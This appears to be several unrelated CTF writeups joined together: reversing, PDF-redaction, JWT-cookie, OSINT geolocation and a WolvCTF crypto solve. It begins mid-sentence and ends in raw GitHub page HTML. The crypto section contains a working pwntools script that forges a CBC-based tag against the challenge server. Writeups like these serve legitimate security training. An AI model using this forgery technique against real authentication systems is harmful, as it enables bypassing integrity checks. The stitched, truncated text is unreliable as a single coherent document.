`CreateLocalUserAndAddToAdminGroup` function takes `text`, which is a part of the flag, as an input in another file. On inspecting the `CreateLocalUserAndAddToAdminGroup` file, I found this code: This code takes the `pass` variable, which is the previously constructed flag, and adds “!}” to it, completing the flag. ![Full Flag Code](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Reversing/EPT1911/munintrollet/fullflag.png) The final flag is then: `EPT{d1d_U_kn0w_rZr1911_R_n0rw3gian?!}`
## Forensics/Secret Message 1 (730 solves)Created by: `SteakEnthusiast`> We swiped a top-secret file from the vaults of a very secret organization, but all the juicy details are craftily concealed. Can you help me uncover them? We are given a PDF file, once viewed has a black bar of what seems to be our flag. ![PDF Black Bar](https://seall.dev/images/ctfs/uoftctf2024/secret-msg-1.png) If we highlight the black bar, we get some text upon copy-pasting the contents from Firefox's PDF viewer. Flag: `uoftctf{fired_for_leaking_secrets_in_a_pdf}` **Files:** [secret.pdf](https://files.seall.dev/ctfs/uoftctf2024/secret-message-1/secret.pdf)
# mmmmm-rbs >Dr. Tom Lei is up to something again and it's not sounding good. We heard he was messing around over at [https://drtomlei.xyz](https://drtomlei.xyz/). Maybe we should look into this.>>Developed by: [Cyb0rgSw0rd](https://github.com/AlfredSimpson) # Solution Initially going to the website, we see some sort of blog home page. ![home page](./mmmmm-rbs-home.png) Navigating to the `/about` page, it gives us an unauthorized error. ![about page](./mmmmm-rbs-about.png) Viewing the source reveals the `/img/` directory, but that's a 404 as well. - <view-source:https://drtomlei.xyz/>- <view-source:https://drtomlei.xyz/about> Looking into the network tab on the initial request we see a cookie ```yummyflag=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmbGFnIjoiamN0ZntnMXYzX20zX3RoM19iMzNmX25fY2gzZGRAcl9wbHp9IiwiaWF0IjoxNzExMzA2NDkxfQ.Bk8gATf5teDucZFrlMh-eAd9HIODeAfChjt0pKAR9Xk; Path=/; HttpOnly; SameSite=Strict``` ![network tab](./mmmmm-rbs-network-tab.png) The cookie value `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmbGFnIjoiamN0ZntnMXYzX20zX3RoM19iMzNmX25fY2gzZGRAcl9wbHp9IiwiaWF0IjoxNzExMzA2NDkxfQ.Bk8gATf5teDucZFrlMh-eAd9HIODeAfChjt0pKAR9Xk` looks like a [JWT](https://jwt.io) because its a long-ish base64 encoded string with 3 sections separated by `.`s. Checking the [JWT Debugger](https://jwt.io) we see the JWT has the key `flag`. ```{ "flag": "jctf{g1v3_m3_th3_b33f_n_ch3dd@r_plz}", "iat": 1711306491}``` ![jwt debugger](./mmmmm-rbs-jwt-debugger.png)
(The writeup looks better [in github](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/tag-series-2))# Crypto: tag-series-2solver: [N04M1st3r](https://github.com/N04M1st3r) writeup-writer: [L3d](https://github.com/imL3d) ![Challege image](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/tag-series-2/_images/challengeimage.png?raw=true) **files (copy):** [chal.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/tag-series-2/files/chal.py) ## Solution ### Preview *It is recommended to read the [first challenge](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/tag-series-1) in this series before reading this one.* This challenge is very similar to the first one; we need to input a plaintext string and a guess to the last block of it's AES (CBC) encryption 4 times in a row - if one of those guesses match we get the flag. The differences from the first challenge:1. AES encryption with mode CBC is used, instead of ECB.2. We get 4 tries instead of 3.3. To each plaintext given it's length is being added to the end before the encryption. 4. The plaintext to get the flag needs to start with a shorter string: `"GET: flag.txt"` And again, before we will showcase the solution, an understanding of how the `AES CBC` mode works is needed, so we can properly try and exploit this algorithm and it's usecase. ### AES (CBC) mode The CBC mode fixes some of the problems with the lack of *cryptographic diffusion* that EBC mode had. Instead of each plaintext block being enciphered on its own, it is being XORed with the previous ciphertext, and only then being encrypted (the first block is being XORed with a random Initialization Vector), as shown in the image below: ![illu1](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/tag-series-2/_images/cbc.png?raw=true) Again, for our purposes in the tag-series challenges, we don't really need to know much about the [Block Cipher algorithm](https://en.wikipedia.org/wiki/Block_cipher), apart from it being a *deterministic algorithm*, meaning that if we give it the same key and the same input, it will always give us the same output. The change from `ECB` mode to `CBC` mode fixes the exploit we used at the previous challenge - because each part affects the following one it seems as though we cannot have two different plaintexts produce the same result. ### The exploit At first glance, this challenge seems very discouraging - we need to find two differnet plaintext inputs that will give us the same last block of ciphertext, but every little change in the previous blocks affects the outcome! After looking further at the `CBC` mode of encryption and the given restrictions, we can come to 2 subtle but important realizations: 1. The same 2 inputs to the XOR and then the Block Encryption, will yield the same ciphertext. 2. It **is** possible to get the same last block of ciphertext from two different plaintexts, we just have to make sure the two inputs to that "part of the chain" are the same (take a look at the illustartaion below). ![illu1](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/raw/main/tag-series-2/_images/illu1.png?raw=true) Because the last block will always contain the legth, our goal is to try and create the same ciphertext of the block that came before it (it's the other part of the XOR), with two different plaintext inputs. For this, we have to do some sort of computation. XOR is commutative operation, and we can leverage this fact to our advantage. As shown in the illustartion below, both the blocks of ciphertexts generated by `1)` and `2)` will be the same. ![illu2](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/raw/main/tag-series-2/_images/illu2.png?raw=true) So, the only thing left to do is just find a way to get `A` and `B`, and to put the pieces together! As it happens, the both parts is really easy (at this point xD) - we have four tries. Lets go over each try, and what information we receive from it: **1, 2.** The plaintext that will be encrypted is `our_input + ITS_LENGTH`. We do this in order to find A and B - they are the last block of a ciphertext that we now know. This part is necessary because we can't evaluate them ourselves, we don't have the key for the Block Encryption (nor the Initializing Vector). But because these factors are the same for each differenty try, it doesn't matter that we don't know them. **3.** The response from this step will be the same result that we should get at the next one. We need to **recreate the terms** the allowed B (or A) to be formed, then append the other ciphertext. This will create the same input to the rest of the encryption, thus allowing us to achive the same result in 2 way (see the illustration above). **4.** For the last time we want to do the same, but swapped - recreate the terms that allowed the other part to be formed, and the send the other one. This will be evaluated to the same last block of ciphertext we recieved at the previous try. NOTE: for this to work both the inputs that created A and B **must** to have the same length - the two final payloads will contain these inputs, and the lengths of those payloads need to be the same for us to get the same result. This is an illustartion of the final payload: ![illu3](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/raw/main/tag-series-2/_images/illu3.png?raw=true) The implementation of the exploit we devised in code: ```python from pwn import * INPUT1 = b"GET: flag.txt" + b"pad" # The last plaintext we send, is obligated start with this string to get the flag INPUT2 = b"The-C0d3Bre4k3rs" # Second input, needs to be the same length as the first - 16 bytesLEN16 = b'\x00' * 15 + b'\x10' # The length of our inputs con = connect('tagseries2.wolvctf.io', 1337) con.recvuntil(b'disabled ==')con.recvline() con.sendline(INPUT1)con.sendline(b'irrelevant')A = con.recvline()[:-1] # the output of INPUT1 + ITS_LEN con.sendline(INPUT2)con.sendline(b'irrelevant')B = con.recvline()[:-1] # the output of INPUT2 + ITS_LEN # The parts that make B then Acon.sendline(INPUT2 + LEN16 + A)con.sendline(b'irrelevant')result = con.recvline()[:-1] # The parts that make A then Bcon.sendline(INPUT1 + LEN16 + B)con.sendline(result) # This has the same result as the one we performed above flag = con.recvline()[:-1]print(flag) con.close()``` We get the flag?: `wctf{W0w_1_w4s_ev3n_u51ng_CBC}` To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/tag-series-3) ➡️
> Find what street this picture was taken from.> > Format the flag as the following: The street name in all caps with the spaces replaced by underscores. Write the full word for any abbreviated parts of the name.> > Example: If the street was Bourbon St the flag would be: texsaw{BOURBON_STREET} ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-91.png) When we look at the image, the first thing that catches our attention is the sign on the right side, the Bael Bank Sign, if we look at the Bael Banks in America, it will take us a lot of time. What we need to do is do a Google image search for the building right in front of us. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-92.png) We’re finding a replica of the building. Here we need to find the address of the building ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-93.png) Search for “TCC Legacy Kincaid” on Google Maps. We’re looking in the Plano area. You can follow the [video](https://margheritaviola.com/2024/03/26/texsaw2024-osint-geo-location-writeup/). We’ll find the street name. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-94.png)
[![VIDEO](https://img.youtube.com/vi/JpZ9nTx-2PI/0.jpg)](https://youtu.be/JpZ9nTx-2PI "How to approach an OSINT CTF challenge") ### Description>Can you help us track down this photographer? ? # SolutionWatch video for full solution, or check the [challenge author's official writeup](https://dev.to/therealbrenu/photographs-writeup-2875) More community writeups for this challenge:- [https://github.com/4str4r0th1sH3r3/1337WU/blob/7b63a7e69fef9ae306bb40996c68c7c8a6e89857/Photograph.md](https://github.com/4str4r0th1sH3r3/1337WU/blob/7b63a7e69fef9ae306bb40996c68c7c8a6e89857/Photograph.md)- [https://gist.github.com/Siss3l/884c05b373228c0ddcb3f7b172df6d05#file-osint-md](https://gist.github.com/Siss3l/884c05b373228c0ddcb3f7b172df6d05#file-osint-md)- [https://thevikingskulls.medium.com/writeup-of-photographs-1337up-ctf-by-intigriti-ef77414e486b](https://thevikingskulls.medium.com/writeup-of-photographs-1337up-ctf-by-intigriti-ef77414e486b)
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-0eace2597ca3.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a167e256da9c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-d11f2cf8009b.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-ea7373db06c8.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-af6c685139ba.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-578cdbc8a5a9.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-9b32204967c6.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-primitives-366b5c973fad.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-f3607eccaaae.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1e8b6cfe1b6c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-19c85be4af9c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-ad2fce00d003.css" /> <script type="application/json" id="client-env">{"locale":"en","featureFlags":["code_vulnerability_scanning","copilot_conversational_ux_history_refs","copilot_smell_icebreaker_ux","copilot_implicit_context","failbot_handle_non_errors","geojson_azure_maps","image_metric_tracking","marketing_forms_api_integration_contact_request","marketing_pages_search_explore_provider","turbo_experiment_risky","sample_network_conn_type","no_character_key_shortcuts_in_inputs","react_start_transition_for_navigations","custom_inp","remove_child_patch","site_features_copilot_cli_ga","copilot_code_chat_diff_header_button"]}</script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-c3a4dc56fecc.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-5bd9ba639cc0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-27057bd9ed0b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b-d1813ba335d8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-654130b7cde5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-68b3d6c8feb2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-369bd99876f6.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-5a0e291a0298.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-52dc4b-4fecca2d00e4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-c7885f4526c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-94209c43e6af.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-244ee9d9ed77.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-4e25e265ef84.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-352d84c6cc82.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-eccae9-1932eeecf006.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-ab2e4b7a3cde.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa-9fad2423070b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--b2311f-4c891ec4eeb9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-704cd44e52d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-614feb194539.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-lib-1fbfc5be2c18.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-a58d7c11e858.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-d5726d25c548.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-1501d3ef83c2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-829932cf63db.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-eaf74522e470.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js-5a4a31c01bca.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_TabNav_-8321f5-2969c7508f3a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6-949a0431d8c0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-4a2cf4ad7f60.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-3208e4c5b7c1.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_paths_index_ts-654469d743cd.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-239b92c64d22.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-3e492a-f8db4e5bb6ca.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6-fd8396d2490b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-code-view-7e6bf8fa8faa.js"></script> <title>Hackfest-2k24-writeup/fileplay at main · raouf-005/Hackfest-2k24-writeup · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)" data-turbo-transient> <meta name="route-controller" content="files" data-turbo-transient> <meta name="route-action" content="disambiguate" data-turbo-transient> <meta name="current-catalog-service-hash" content="82c569b93da5c18ed649ebd4c2c79437db4611a6a1373e805a3cb001c64130b7"> <meta name="request-id" content="A5D8:1E3F5B:10298253:1052988A:6602C958" data-pjax-transient="true"/><meta name="html-safe-nonce" content="0e59c4f2472258473b72f694cf0e8e4d38573247474c8583e0e5a9a9ada469cd" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJBNUQ4OjFFM0Y1QjoxMDI5ODI1MzoxMDUyOTg4QTo2NjAyQzk1OCIsInZpc2l0b3JfaWQiOiI1MDg2MDc5NjIzNDMxODk5NDgwIiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fcmVuZGVyIjoiZnJhIn0=" data-pjax-transient="true"/><meta name="visitor-hmac" content="b1fc9afec9bc118c861387198f6fdac20dba9fd070a5a28ff1f40f1d87e14a01" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:777706471" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree,copilot" data-turbo-transient="true" /> <meta name="selected-link" value="repo_source" data-turbo-transient> <link rel="assets" href="https://github.githubassets.com/"> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="pwn write up. Contribute to raouf-005/Hackfest-2k24-writeup development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905, app-argument=https://github.com/raouf-005/Hackfest-2k24-writeup/tree/main/fileplay" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/0b9d084307699a22b08163e48cd651821373d355dfb2de704ab76d5f57958146/raouf-005/Hackfest-2k24-writeup" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Hackfest-2k24-writeup/fileplay at main · raouf-005/Hackfest-2k24-writeup" /><meta name="twitter:description" content="pwn write up. Contribute to raouf-005/Hackfest-2k24-writeup development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/0b9d084307699a22b08163e48cd651821373d355dfb2de704ab76d5f57958146/raouf-005/Hackfest-2k24-writeup" /><meta property="og:image:alt" content="pwn write up. Contribute to raouf-005/Hackfest-2k24-writeup development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Hackfest-2k24-writeup/fileplay at main · raouf-005/Hackfest-2k24-writeup" /><meta property="og:url" content="https://github.com/raouf-005/Hackfest-2k24-writeup/tree/main/fileplay" /><meta property="og:description" content="pwn write up. Contribute to raouf-005/Hackfest-2k24-writeup development by creating an account on GitHub." /> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta http-equiv="x-pjax-version" content="36d26ff729ccd0451c4f87342473edf4f4dfa31e9e2adf6292489de1cdd087a0" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="5dcfbec3488c5fd5a334e287ce6a17058b7d4beb91db2d4d184e4d55bbf1d7d7" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="c652628a56d6ebd9e6374f6352ae3b2e3718598724a1b0139486b5c791b30c05" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="43aea0ffac4b9a50b8b462ec6dac5df83075a3a3ca173bf44b479ebda34abd4a" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="turbo-cache-control" content="no-cache" data-turbo-transient> <meta data-hydrostats="publish"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/react-code-view.959fb0b61e6a1de773e7.module.css" /> <meta name="go-import" content="github.com/raouf-005/Hackfest-2k24-writeup git https://github.com/raouf-005/Hackfest-2k24-writeup.git"> <meta name="octolytics-dimension-user_id" content="125606070" /><meta name="octolytics-dimension-user_login" content="raouf-005" /><meta name="octolytics-dimension-repository_id" content="777706471" /><meta name="octolytics-dimension-repository_nwo" content="raouf-005/Hackfest-2k24-writeup" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="777706471" /><meta name="octolytics-dimension-repository_network_root_nwo" content="raouf-005/Hackfest-2k24-writeup" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <link rel="mask-icon" href="https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out 